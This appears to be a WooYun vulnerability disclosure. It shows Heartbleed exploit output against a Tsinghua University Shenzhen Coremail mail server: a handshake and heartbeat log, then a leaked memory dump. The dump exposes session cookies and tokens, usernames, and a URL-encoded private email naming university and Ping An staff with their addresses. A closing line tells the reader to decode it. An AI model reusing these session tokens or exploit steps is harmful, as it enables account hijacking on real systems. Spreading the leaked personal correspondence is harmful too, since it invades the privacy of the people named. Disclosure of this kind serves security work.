WooYun.org

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 2517
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.mage/gif, image/pjpeg, application/x-ms-xbap, */*..Referer: https://mail.sz.tsinghua.edu.cn/coremail/XJS/main/intervalCheck.jsp?sid=BAPFENWWPilEQJSNkMWWQYDyuyuPAcfy&doCheck=true&ts=Tue Jul 7 20:57:35 UTC+0800 2015..Accept-Language: zh-CN..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; MDDCJS)..Host: mail.sz.tsinghua.edu.cn..Connection: Keep-Alive..Cookie: uid=zhong.wei; locale=zh_CN; CoremailReferer=http%3A%2F%2Fmail.sz.tsinghua.edu.cn%2F; Coremail.sid=BAPFENWWPilEQJSNkMWWQYDyuyuPAcfy; Coremail=c7b0ccaaf1bd863777c68167be10d4b6....M.\.z.ph.|....y..i.d=organic|utmctr=%E6%99%AE%E6%B8%A1%E5%A4%A7%E5%AD%A6%E5%BC%A0%E4%B8%87%E9%9D%92; __utma=135304371.811625991.1432202553.1432814381.1434117765.4; __utmz=135304371.1432814381.3.3.utmcsr=haosou.com|utmccn=(organic)|utmcmd=organic|utmctr=www.info.sz.tsinghua.edu.cn; visit="v=1&G"; uid=zhangxx; locale=zh_CN; CoremailReferer=http%3A%2F%2Fmail.sz.tsinghua.edu.cn%2F; Coremail.sid=BAxFENWWdqVEQJEGzMWWIbFbRWYhXKDy; Coremail=808cf52a16ec33b68d8b0c17ab4089d3....%b..E..i~y...k.....r...O..k; nodeType=2; uid=qian.xiang; CoremailReferer=http%3A%2F%2Fmail.sz.tsinghua.edu.cn%2F; Coremail.sid=BAHUENWWNzUEQJgxzMWWilQVRbWprwTy; Coremail=c6a9a9810c4f659bb42e08246046480a....4.....x.f~.|o...E7%94%9F%E7%BA%A6100%E4%BA%BA%0D%0A%0D%0A%E6%B4%BB%E5%8A%A8%E6%9C%80%E5%A5%BD%E5%AE%89%E6%8E%92%E5%9C%A89%E6%9C%886%E6%97%A5%EF%BC%88%E5%91%A8%E6%97%A5%EF%BC%8C%E4%B8%8A%E7%8F%AD%E6%97%A5%EF%BC%89%E6%88%969%E6%9C%889-10%E6%97%A5%EF%BC%88%E5%91%A8%E4%B8%89-%E5%91%A8%E4%BA%94%EF%BC%89%E6%9C%9F%E9%97%B4%EF%BC%8C%0D%0A%0D%0A%E8%AE%B2%E5%BA%A7%E6%9C%80%E5%A5%BD%E5%9C%A8%E7%99%BD%E5%A4%A9%EF%BC%8C%E6%99%9A%E4%B8%8A%E4%B9%9F%E5%8F%AF%EF%BC%8C%E7%9C%8B%E8%AE%B2%E5%BA%A7%E5%98%89%E5%AE%BE%E4%BB%80%E4%B9%88%E6%97%B6%E9%97%B4%E6%96%B9%E4%BE%BF%E3%80%82%0D%0A%0D%0A%0D%0A%0D%0A-----%E5%8E%9F%E5%A7%8B%E9%82%AE%E4%BB%B6-----%0D%0A%E5%8F%91%E4%BB%B6%E4%BA%BA%3A+%22%E9%A1%BE%E7%AB%8B%E5%9F%BA%22+%3Cgu.liji@sz.tsinghua.edu.cn%3E%0D%0A%E5%8F%91%E9%80%81%E6%97%B6%E9%97%B4%3A+2015-07-07+18%3A36%3A44+%28%E6%98%9F%E6%9C%9F%E4%BA%8C%29%0D%0A%E6%94%B6%E4%BB%B6%E4%BA%BA%3A+%22%E4%BB%BB%E4%BD%9C%E9%A3%8E%22+%3CRENZUOFENG001@pingan.com.cn%3E%0D%0A%E6%8A%84%E9%80%81%3A+%22%E5%88%98%E7%A8%8B%28Cheng+Liu%29%22+%3Cliucheng@pingan.com.cn%3E%2C+%22%E9%87%91%E7%BB%8D%E6%A8%91%28Shaoliang+Jin%29%22+%3Cjinsl@pingan.com.cn%3E%2C+%22%E7%94%B0%E9%9B%85%E8%8A%B3%22+%3Ctianyf@sz.tsinghua.edu.cn%3E%0D%0A%E4%B8%BB%E9%A2%98%3A+%E9%87%91%E8%9E%8D%E7%A1%95%E5%A3%AB%E5%BC%BA%E5%8C%96%E5%91%A8%E5%AE%89%E6%8E%92%E5%B8%8C%E6%9C%9B%E8%83%BD%E5%AE%89%E6%8E%92100-110%E4%BD%8D%E5%AD%A6%E7%94%9F%E5%8F%82%E8%A7%82%E5%B9%B3%E5%AE%89%E9%87%91%E8%9E%8D%E5%AD%A6%E9%99%A2%0D%0A%0D%0A%E5%B0%8F%E4%BB%BB%EF%BC%9A%0D%0A%E6%84%9F%E8%B0%A2%E5%B9%B3%E5%AE%89%E6%9C%89%E5%85%B3%E5%90%8C%E4%BA%8B%E5%8E%BB%E5%B9%B4%E5%AF%B9%E6%B8%85%E5%8D%8E%E5%A4%A7%E5%AD%A6%E7%BB%8F%E7%AE%A1%E5%AD%A6%E9%99%A2%E5%9C%A8%E6%B7%B1%E5%9C%B3%E9%87%91%E8%9E%8D%E7%A1%95%E5%A3%AB%E6%96%B0%E7%94%9F%E5%85%A5%E5%AD%A6%E5%BC%BA%E5%8C%96%E5%91%A8%E6%95%99%E8%82%B2%E7%9A%84%E6%94%AF%E6%8C%81%EF%BC%8C%0D%0A%E6%96%B0%E7%9A%84%E4%B8%80%E5%B9%B4%E6%96%B0%E7%94%9F%E7%A7%8B%E5%AD%A3%E9%87%91%E8%9E%8D%E7%A1%95%E5%A3%AB%E5%BC%BA%E5%8C%96%E5%91%A8%E5%AE%89%E6%8E%92%E5%8F%88%E5%BC%80%E5%A7%8B%E3%80%82%E8%B4%9F%E8%B4%A3%E8%80%81%E5%B8%88%E7%94%B0%E9%9B%85%E8%8A%B3%E6%9C%89%E5%A6%82%E4%B8%8B%E8%A6%81%E6%B1%82%EF%BC%9A%0D%0A%E3%80%9D2015%E7%BA%A7%E6%96%B0%E7%94%9F%E5%BC%BA%E5%8C%96%E5%91%A8%E6%B4%BB%E5%8A%A8%E5%B0%86%E4%BA%8E8%E6%9C%8831%E6%97%A5-9%E6%9C%8811%E6%97%A5%E8%BF%9B%E8%A1%8C%EF%BC%889%E6%9C%883-5%E6%97%A5%E6%94%BE%E5%81%87%EF%BC%89%EF%BC%8C%E4%B8%BA%E4%BA%86%E4%B8%B0%E5%AF%8C%0D%0A%0D%0A%E9%87%91%E8%9E%8D%E7%A1%95%E5%A3%AB%E7%9A%84%E6%B4%BB%E5%8A%A8%E5%AE%89%E6%8E%92%EF%BC%8C%E5%B8%8C%E6%9C%9B%E8%83%BD%E5%AE%89%E6%8E%92100-110%E4%BD%8D%E5%AD%A6%E7%94%9F%E5%8F%82%E8%A7%82%E5%B9%B3%E5%AE%89%E9%87%91%E8%9E%8D%E5%AD%A6%E9%99%A2%EF%BC%8C%E9%99%A4%E5%8F%82%E8%A7%82%E5%B1%95%E5%8E%85%E5%A4%96%EF%BC%8C%0D%0A%0D%0A%E8%BF%98%E9%9D%9E%E5%B8%B8%E6%9C%9F%E5%BE%85%E8%83%BD%E8%AF%B7%E5%88%B0%E5%B9%B3%E5%AE%89%E7%9B%B8%E5%85%B3%E7%9A%84%E9%A2%86%E5%AF%BC%E4%B8%BA%E5%90%8C%E5%AD%A6%E4%BB%AC%E6%B7%B1%E5%85%A5%E8%AE%B2%E8%A7%A3%E4%B8%80%E4%B8%8B%E5%B9%B3%E5%AE%89%E7%9A%84%E6%83%85%E5%86%B5%E6%88%96%E9%92%88%E5%AF%B9%E6%9F%90%E4%B8%AA%E4%B8%BB%E9%A2%98%0D%0A%0D%0A%E5%81%9A%E4%B8%80%E5%9C%BA%E8%AE%B2%E5%BA%A7%E3%80%82%E3%80%9E%0D%0A%0D%0A%E3%80%9D%E8%BF%98%E9%9D%9E%E5%B8%B8%E6%9C%9F%E5%BE%85%E8%83%BD%E8%AF%B7%E5%88%B0%E5%B9%B3%E5%AE%89%E7%9B%B8%E5%85%B3%E7%9A%84%E9%A2%86%E5%AF%BC%E4%B8%BA%E5%90%8C%E5%AD%A6%E4%BB%AC%E6%B7%B1%E5%85%A5%E8%AE%B2%E8%A7%A3%E4%B8%80%E4%B8%8B%E5%B9%B3%E5%AE%89%E7%9A%84%E6%83%85%E5%86%B5%E6%88%96%E9%92%88%E5%AF%B9%E6%9F%90%E4%B8%AA%E4%B8%BB%E9%A2%98%0D%0A%0D%0A%E5%81%9A%E4%B8%80%E5%9C%BA%E8%AE%B2%E5%BA%A7%E3%80%9E%E8%BF%99%E4%B8%80%E5%AE%89%E6%8E%92%E8%BF%98%E5%8F%AF%E4%BB%A5%E6%9C%89%E4%B8%80%E9%80%89%E6%8B%A9%EF%BC%9A%E6%88%91%E5%8F%AF%E4%BB%A5%E9%9A%8F%E5%AD%A6%E7%94%9F%E4%B8%80%E8%B5%B7%E6%9D%A5%EF%BC%8C%E6%88%91%E4%BB%A3%E8%A1%A8%E5%B9%B3%E5%AE%89%E4%B8%8E%E5%AD%A6%E7%94%9F%E4%BA%92%E5%8A%A8%EF%BC%8C%0D%0A%E4%BD%86%E9%9C%80%E4%BD%A0%E4%BB%
把url编码的内容解码下，就能看到内容。cookie里面有发件人姓名